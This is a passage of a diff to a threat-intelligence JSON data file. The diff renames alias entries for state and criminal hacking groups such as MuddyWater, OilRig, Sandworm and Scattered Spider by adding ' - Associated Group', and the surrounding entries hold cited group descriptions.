2019](https://app.tidalcyber.com/references/38216a34-5ffd-4e79-80b1-7270743b728e)][[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]", @@ -7033,7 +7033,7 @@ } ], "uuid": "ac24e233-2250-477b-a4cb-6ae018d5836b", - "value": "Static Kitten" + "value": "Static Kitten - Associated Group" }, { "description": "[[FireEye MuddyWater Mar 2018](https://app.tidalcyber.com/references/82cddfa6-9463-49bb-8bdc-0c7d6b0e1472)][[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)][[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", @@ -7047,7 +7047,7 @@ } ], "uuid": "b4215569-ec22-43ad-839a-67cd09030e2e", - "value": "TEMP.Zagros" + "value": "TEMP.Zagros - Associated Group" }, { "description": "[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]", @@ -7061,7 +7061,7 @@ } ], "uuid": "d4cd493f-b88d-4687-b040-60be94e42a65", - "value": "MERCURY" + "value": "MERCURY - Associated Group" }, { "description": "[[Symantec MuddyWater Dec 2018](https://app.tidalcyber.com/references/a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d)][[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)][[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", @@ -7075,7 +7075,7 @@ } ], "uuid": "9c03d056-8c91-43c9-a9e9-ef7c82b12bca", - "value": "Seedworm" + "value": "Seedworm - Associated Group" }, { "description": "[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", @@ -7089,7 +7089,7 @@ } ], "uuid": "a862ce87-d79a-485a-8ba2-c7c843e60422", - "value": "Earth Vetala" + "value": "Earth Vetala - Associated Group" }, { "description": "[MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)] Since at least 2017, [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.[[Unit 42 MuddyWater Nov 2017](https://app.tidalcyber.com/references/dcdee265-2e46-4f40-95c7-6a2683edb23a)][[Symantec MuddyWater Dec 2018](https://app.tidalcyber.com/references/a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d)][[ClearSky MuddyWater Nov 2018](https://app.tidalcyber.com/references/a5f60f45-5df5-407d-9f68-bc5f7c42ee85)][[ClearSky MuddyWater June 2019](https://app.tidalcyber.com/references/9789d60b-a417-42dc-b690-24ccb77b8658)][[Reaqta MuddyWater November 2017](https://app.tidalcyber.com/references/ecd28ccf-edb6-478d-a8f1-da630df42127)][[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)][[Talos MuddyWater Jan 2022](https://app.tidalcyber.com/references/a2d79c6a-16d6-4dbd-b8a5-845dcc36212d)]", @@ -7180,7 +7180,7 @@ } ], "uuid": "04d6b7f4-19e6-41a7-b76a-2e82a7d69e3e", - "value": "TA416" + "value": "TA416 - Associated Group" }, { "description": "[[Recorded Future REDDELTA July 2020](https://app.tidalcyber.com/references/e2bc037e-d483-4670-8281-70e51b16effe)][[Proofpoint TA416 Europe March 2022](https://app.tidalcyber.com/references/5731d7e4-dd19-4d08-b493-7b1a467599d3)]", @@ -7194,7 +7194,7 @@ } ], "uuid": "6e798bec-4713-4242-88ec-e4a77b29db22", - "value": "RedDelta" + "value": "RedDelta - Associated Group" }, { "description": "[[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)]", @@ -7208,7 +7208,7 @@ } ], "uuid": "ed80cd5e-afc8-4f59-b567-ec97fdc37a37", - "value": "BRONZE PRESIDENT" + "value": "BRONZE PRESIDENT - Associated Group" }, { "description": "[Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.[[Crowdstrike MUSTANG PANDA June 2018](https://app.tidalcyber.com/references/35e72170-b1ec-49c9-aefe-a24fc4302fa6)][[Anomali MUSTANG PANDA October 2019](https://app.tidalcyber.com/references/70277fa4-60a8-475e-993a-c74241b76127)][[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)] ", @@ -7345,7 +7345,7 @@ } ], "uuid": "2e09d081-dcb5-4b3e-8dca-2b64dc37cc2b", - "value": "DustSquad" + "value": "DustSquad - Associated Group" }, { "description": "\n[Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)][[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)][[ESET Nomadic Octopus 2018](https://app.tidalcyber.com/references/50dcb3f0-1461-453a-aab9-38c2e259173f)]", @@ -7380,7 +7380,7 @@ } ], "uuid": "d840e923-ef0c-45d6-926f-e12016d1fe54", - "value": "IRN2" + "value": "IRN2 - Associated Group" }, { "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.[[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)][[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)][[Check Point APT34 April 2021](https://app.tidalcyber.com/references/593e8f9f-88ec-4bdc-90c3-1a320fa8a041)]", @@ -7394,7 +7394,7 @@ } ], "uuid": "17ac9e60-dfad-4ee5-a61c-7b7ee6686a73", - "value": "APT34" + "value": "APT34 - Associated Group" }, { "description": "[[Secureworks COBALT GYPSY Threat Profile](https://app.tidalcyber.com/references/f1c21834-7536-430b-8539-e68373718b4d)]", @@ -7408,7 +7408,7 @@ } ], "uuid": "e8d4a791-a117-4e1e-8a7a-8a90422d4a90", - "value": "COBALT GYPSY" + "value": "COBALT GYPSY - Associated Group" }, { "description": "[[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)][[Crowdstrike Helix Kitten Nov 2018](https://app.tidalcyber.com/references/3fc0d7ad-6283-4cfd-b72f-5ce47594531e)]", @@ -7422,7 +7422,7 @@ } ], "uuid": "8779d808-ed34-44bc-a3e3-8b0954bc8022", - "value": "Helix Kitten" + "value": "Helix Kitten - Associated Group" }, { "description": "[[Unit42 OilRig Playbook 2023](https://app.tidalcyber.com/references/e38902bb-9bab-5beb-817b-668a67a76541)]", @@ -7436,7 +7436,7 @@ } ], "uuid": "9cbeb785-fe7e-5bf7-b860-bf1bf8bf7f09", - "value": "Evasive Serpens" + "value": "Evasive Serpens - Associated Group" }, { "description": "[OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.[[Palo Alto OilRig April 2017](https://app.tidalcyber.com/references/fb561cdd-03f6-4867-b5b5-7e4deb11f0d0)][[ClearSky OilRig Jan 2017](https://app.tidalcyber.com/references/f19f9ad4-bb31-443b-9c26-87946469a0c3)][[Palo Alto OilRig May 2016](https://app.tidalcyber.com/references/53836b95-a30a-4e95-8e19-e2bb2f18c738)][[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)][[Unit42 OilRig Playbook 2023](https://app.tidalcyber.com/references/e38902bb-9bab-5beb-817b-668a67a76541)][[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)][[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)]", @@ -7553,7 +7553,7 @@ } ], "uuid": "938d3a61-cb8b-4ec3-9bf0-f27833a0f96f", - "value": "Chinastrats" + "value": "Chinastrats - Associated Group" }, { "description": "MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. [[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)] [[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)]", @@ -7567,7 +7567,7 @@ } ], "uuid": "23ef9d36-8cb3-4992-abda-709777b97cc3", - "value": "MONSOON" + "value": "MONSOON - Associated Group" }, { "description": "It is believed that the actors behind [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) are the same actors behind Operation Hangover. [[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)] [[Operation Hangover May 2013](https://app.tidalcyber.com/references/fd581c0c-d93e-4396-a372-99cde3cd0c7c)]", @@ -7581,7 +7581,7 @@ } ], "uuid": "364de163-80dc-4f0f-8b42-837ae97a2088", - "value": "Operation Hangover" + "value": "Operation Hangover - Associated Group" }, { "description": "[Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.[[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)][[Unit 42 BackConfig May 2020](https://app.tidalcyber.com/references/f26629db-c641-4b6b-abbf-b55b9cc91cf1)][[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]", @@ -7595,7 +7595,7 @@ } ], "uuid": "2c043629-b8f6-475f-a436-abc01aad9421", - "value": "Hangover Group" + "value": "Hangover Group - Associated Group" }, { "description": "[[Symantec Patchwork](https://app.tidalcyber.com/references/a6172463-56e2-49f2-856d-f4f8320d7c6e)] [[Securelist Dropping Elephant](https://app.tidalcyber.com/references/2efa655f-ebd3-459b-9fd7-712d3f4ba1f8)] [[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)] [[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]", @@ -7609,7 +7609,7 @@ } ], "uuid": "8f4890c6-6db0-4536-8624-35cb02bb94a7", - "value": "Dropping Elephant" + "value": "Dropping Elephant - Associated Group" }, { "description": "[Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.[[Cymmetria Patchwork](https://app.tidalcyber.com/references/d4e43b2c-a858-4285-984f-f59db5c657bd)] [[Symantec Patchwork](https://app.tidalcyber.com/references/a6172463-56e2-49f2-856d-f4f8320d7c6e)][[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)][[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]", @@ -7819,7 +7819,7 @@ } ], "uuid": "aa5e87f3-6e59-4abf-aeba-a49eb9d495f3", - "value": "StrongPity" + "value": "StrongPity - Associated Group" }, { "description": "[PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) has demonstrated similarity to another activity group called [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) due to overlapping victim and campaign characteristics.[[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)][[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)][[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]", @@ -7858,7 +7858,7 @@ } ], "uuid": "bab4d1df-a6c6-40ae-b583-83c4492cbbd2", - "value": "APT2" + "value": "APT2 - Associated Group" }, { "description": "[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", @@ -7872,7 +7872,7 @@ } ], "uuid": "9975905f-c429-4911-800d-d21e9a29b3f8", - "value": "MSUpdater" + "value": "MSUpdater - Associated Group" }, { "description": "[Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). [[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", @@ -8078,7 +8078,7 @@ } ], "uuid": "4316121a-b50b-40bc-bb4b-2c6fc9ec127b", - "value": "Telebots" + "value": "Telebots - Associated Group" }, { "description": "[[Secureworks IRON VIKING ](https://app.tidalcyber.com/references/900753b3-c5a2-4fb5-ab7b-d38df867077b)][[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", @@ -8092,7 +8092,7 @@ } ], "uuid": "eeb7e31b-93e9-4244-a31a-6ce9116a4b70", - "value": "IRON VIKING" + "value": "IRON VIKING - Associated Group" }, { "description": "[[CrowdStrike VOODOO BEAR](https://app.tidalcyber.com/references/ce07d409-292d-4e8e-b1af-bd5ba46c1b95)][[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", @@ -8106,7 +8106,7 @@ } ], "uuid": "819b7ba2-f3be-4649-b499-525f8c0579eb", - "value": "Voodoo Bear" + "value": "Voodoo Bear - Associated Group" }, { "description": "[[Dragos ELECTRUM](https://app.tidalcyber.com/references/494f7056-7a39-4fa0-958d-fb1172d01852)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", @@ -8120,7 +8120,7 @@ } ], "uuid": "483450ad-d811-4f3e-85db-f2761fa308a6", - "value": "ELECTRUM" + "value": "ELECTRUM - Associated Group" }, { "description": "[[NCSC Sandworm Feb 2020](https://app.tidalcyber.com/references/d876d037-9d24-44af-b8f0-5c1555632b91)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", @@ -8134,7 +8134,7 @@ } ], "uuid": "42a50ea5-66f1-4802-b2a0-3fe6ea4f42d4", - "value": "BlackEnergy (Group)" + "value": "BlackEnergy (Group) - Associated Group" }, { "description": "[[iSIGHT Sandworm 2014](https://app.tidalcyber.com/references/63622990-5467-42b2-8f45-b675dfc4dc8f)] [[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", @@ -8148,7 +8148,7 @@ } ], "uuid": "5f428057-fad5-4ba5-bd2e-ff0505184371", - "value": "Quedagh" + "value": "Quedagh - Associated Group" }, { "description": "[[Microsoft Prestige ransomware October 2022](https://app.tidalcyber.com/references/b57e1181-461b-5ada-a739-873ede1ec079)]", @@ -8162,7 +8162,7 @@ } ], "uuid": "84c4e254-d02f-5141-b0c6-d52618177024", - "value": "IRIDIUM" + "value": "IRIDIUM - Associated Group" }, { "description": "[Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)] This group has been active since at least 2009.[[iSIGHT Sandworm 2014](https://app.tidalcyber.com/references/63622990-5467-42b2-8f45-b675dfc4dc8f)][[CrowdStrike VOODOO BEAR](https://app.tidalcyber.com/references/ce07d409-292d-4e8e-b1af-bd5ba46c1b95)][[USDOJ Sandworm Feb 2020](https://app.tidalcyber.com/references/fefa7321-cd60-4c7e-a9d5-c723d88013f2)][[NCSC Sandworm Feb 2020](https://app.tidalcyber.com/references/d876d037-9d24-44af-b8f0-5c1555632b91)]\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)] Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5).[[US District Court Indictment GRU Oct 2018](https://app.tidalcyber.com/references/56aeab4e-b046-4426-81a8-c3b2323492f0)]", @@ -8267,7 +8267,7 @@ } ], "uuid": "a8be581c-10b8-5d79-b35b-ebc47e511597", - "value": "Roasted 0ktapus" + "value": "Roasted 0ktapus - Associated Group" }, { "description": "[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", @@ -8283,7 +8283,7 @@ } ], "uuid": "890f22c5-6e7f-461f-8099-bb7d7c062d27", - "value": "Starfraud" + "value": "Starfraud - Associated Group" }, { "description": "[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", @@ -8299,7 +8299,7 @@ } ], "uuid": "d850076d-6caa-46f2-958d-4e93f43b88f6", - "value": "UNC3944" + "value": "UNC3944 - Associated Group" }, { "description": "[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", @@ -8315,7 +8315,7 @@ } ], "uuid": "36002039-b1dc-46bd-affe-fd37edae375c", - "value": "Scatter Swine" + "value": "Scatter Swine - Associated Group" }, { "description": "[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", @@ -8331,7 +8331,7 @@ } ], "uuid": "fd282f3e-0aba-4f40-873f-1b1e56f55591", - "value": "Muddled Libra" + "value": "Muddled Libra - Associated Group" }, { "description": "[Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) is a cybercriminal group that has been active since at least 2022 targeting customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. During campaigns [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) has leveraged targeted social-engineering techniques and attempted to bypass popular endpoint security tools.[[CrowdStrike Scattered Spider Profile](https://app.tidalcyber.com/references/a865a984-7f7b-5f82-ac4a-6fac79a2a753)][[CrowdStrike Scattered Spider BYOVD January 2023](https://app.tidalcyber.com/references/d7d86f5d-1f02-54b0-b6f4-879878563245)][[Crowdstrike TELCO BPO Campaign December 2022](https://app.tidalcyber.com/references/382785e1-4ef3-506e-b74f-cd07df9ae46e)]", @@ -8431,7 +8431,7 @@ } ], "uuid": "3e580fae-6d8a-4c1c-b132-ddf47d0ff6c9", - "value": "T-APT-04" + "value": "T-APT-04 - Associated Group" }, { "description": "[[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]", @@ -8445,7 +8445,7 @@ } ], "uuid": "023a26e3-77a9-44b3-932f-23c82100881c", - "value": "Rattlesnake" + "value": "Rattlesnake - Associated Group" }, { "description": "[Sidewinder](https://app.tidalcyber.com/groups/44f8bd4e-a357-4a76-b031-b7455a305ef0) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.[[ATT Sidewinder January 2021](https://app.tidalcyber.com/references/d6644f88-d727-4f62-897a-bfa18f86380d)][[Securelist APT Trends April 2018](https://app.tidalcyber.com/references/587f5195-e696-4a3c-8c85-90b9c002cd11)][[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]", @@ -8498,7 +8498,7 @@ } ], "uuid": "4e28aead-8a85-4ae2-88d0-fa21fc7aa6a0", - "value": "Whisper Spider" + "value": "Whisper Spider - Associated Group" }, { "description": "[Silence](https://app.tidalcyber.com/groups/b534349f-55a4-41b8-9623-6707765c3c50) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.[[Cyber Forensicator Silence Jan 2019](https://app.tidalcyber.com/references/c328d6d3-5e8b-45a6-8487-eecd7e8cbf7e)][[SecureList Silence Nov 2017](https://app.tidalcyber.com/references/004a8877-7e57-48ad-a6ce-b9ad8577cc68)] ", @@ -8545,7 +8545,7 @@ } ], "uuid": "c39d60d6-bb43-47e5-bc8d-e73fa1ef8c1d", - "value": "TA407" + "value": "TA407 - Associated Group" }, { "description": "[[Secureworks COBALT DICKENS August 2018](https://app.tidalcyber.com/references/addbb46b-b2b5-4844-b4be-f6294cf51caa)][[Secureworks COBALT DICKENS September 2019](https://app.tidalcyber.com/references/45815e4d-d678-4823-8315-583893e263e6)][[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)][[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]", @@ -8559,7 +8559,7 @@ } ], "uuid": "1a968e44-b931-4373-96f8-ecb976540fd3", - "value": "COBALT DICKENS" + "value": "COBALT DICKENS - Associated Group" }, { "description": "[Silent Librarian](https://app.tidalcyber.com/groups/0e7bd4da-7974-49c9-b213-116bd7157761) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of [Silent Librarian](https://app.tidalcyber.com/groups/0e7bd4da-7974-49c9-b213-116bd7157761) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).[[DOJ Iran Indictments March 2018](https://app.tidalcyber.com/references/7dfdccd5-d035-4678-89c1-f5f1630d7a79)][[Phish Labs Silent Librarian](https://app.tidalcyber.com/references/d79d0510-4d49-464d-8074-daedd186f1c1)][[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]", @@ -8716,7 +8716,7 @@ } ], "uuid": "bb2eac9b-3dfc-487a-8dff-b8de5f6e3041", - "value": "ProjectSauron" + "value": "ProjectSauron - Associated Group" }, { "description": "[Strider](https://app.tidalcyber.com/groups/deb573c6-071a-4b50-9e92-4aa648d8bdc1) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.[[Symantec Strider Blog](https://app.tidalcyber.com/references/664eac41-257f-4d4d-aba5-5d2e8e2117a7)][[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)]", @@ -8832,7 +8832,7 @@ } ], "uuid": "4f21a323-28d3-498d-8cfe-a1835eebd561", - "value": "Hive0065" + "value": "Hive0065 - Associated Group" }, { "description": "[TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) is a cyber criminal group that has been active since at least 2014. [TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://app.tidalcyber.com/software/5321aa75-924c-47ae-b97a-b36f023abf2a).[[Proofpoint TA505 Sep 2017](https://app.tidalcyber.com/references/c1fff36f-802b-4436-abce-7f2787c148db)][[Proofpoint TA505 June 2018](https://app.tidalcyber.com/references/e48dec7b-5635-4ae0-b0db-229660806c06)][[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)][[NCC Group TA505](https://app.tidalcyber.com/references/45e0b869-5447-491b-9e8b-fbf63c62f5d6)][[Korean FSI TA505 2020](https://app.tidalcyber.com/references/d4e2c109-341c-45b3-9d41-3eb980724524)]", @@ -8880,7 +8880,7 @@ } ], "uuid": "2d829442-7a16-46ab-9d4d-b92cd1f0be7e", - "value": "Shathak" + "value": "Shathak - Associated Group" }, { "description": "[[Secureworks GOLD CABIN](https://app.tidalcyber.com/references/778babec-e7d3-4341-9e33-aab361f2b98a)]", @@ -8894,7 +8894,7 @@ } ], "uuid": "f9c58990-a69d-4edc-ad9d-ec74412da18a", - "value": "GOLD CABIN" + "value": "GOLD CABIN - Associated Group" }, { "description": "[TA551](https://app.tidalcyber.com/groups/8951bff3-c444-4374-8a9e-b2115d9125b2) is a financially-motivated threat group that has been active since at least 2018. [[Secureworks GOLD CABIN](https://app.tidalcyber.com/references/778babec-e7d3-4341-9e33-aab361f2b98a)] The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. [[Unit 42 TA551 Jan 2021](https://app.tidalcyber.com/references/8e34bf1e-86ce-4d52-a6fa-037572766e99)]", @@ -8967,7 +8967,7 @@ } ], "uuid": "cbba6443-46cd-4602-87ff-1142995202ab", - "value": "XENOTIME" + "value": "XENOTIME - Associated Group" }, { "description": "[TEMP.Veles](https://app.tidalcyber.com/groups/3a54b8dc-a231-4db8-96da-1c0c1aa396f6) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://app.tidalcyber.com/software/), a malware framework designed to manipulate industrial safety systems.[[FireEye TRITON 2019](https://app.tidalcyber.com/references/49c97b85-ca22-400a-9dc4-6290cc117f04)][[FireEye TEMP.Veles 2018](https://app.tidalcyber.com/references/e41151fa-ea11-43ca-9689-c65aae63a8d2)][[FireEye TEMP.Veles JSON April 2019](https://app.tidalcyber.com/references/491783dc-7a6b-42a6-b923-c4439117e7e4)]", @@ -9025,7 +9025,7 @@ } ], "uuid": "a3bf437b-2805-424a-8122-b1f07f68c3c2", - "value": "TG-1314" + "value": "TG-1314 - Associated Group" }, { "description": "[Threat Group-1314](https://app.tidalcyber.com/groups/0f86e871-0c6c-4227-ae28-3f3696d6ae9d) is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. [[Dell TG-1314](https://app.tidalcyber.com/references/79fc7568-b6ff-460b-9200-56d7909ed157)]", @@ -9054,7 +9054,7 @@ } ], "uuid": "acc5d023-b5f9-40c0-9061-8424c14334a4", - "value": "Earth 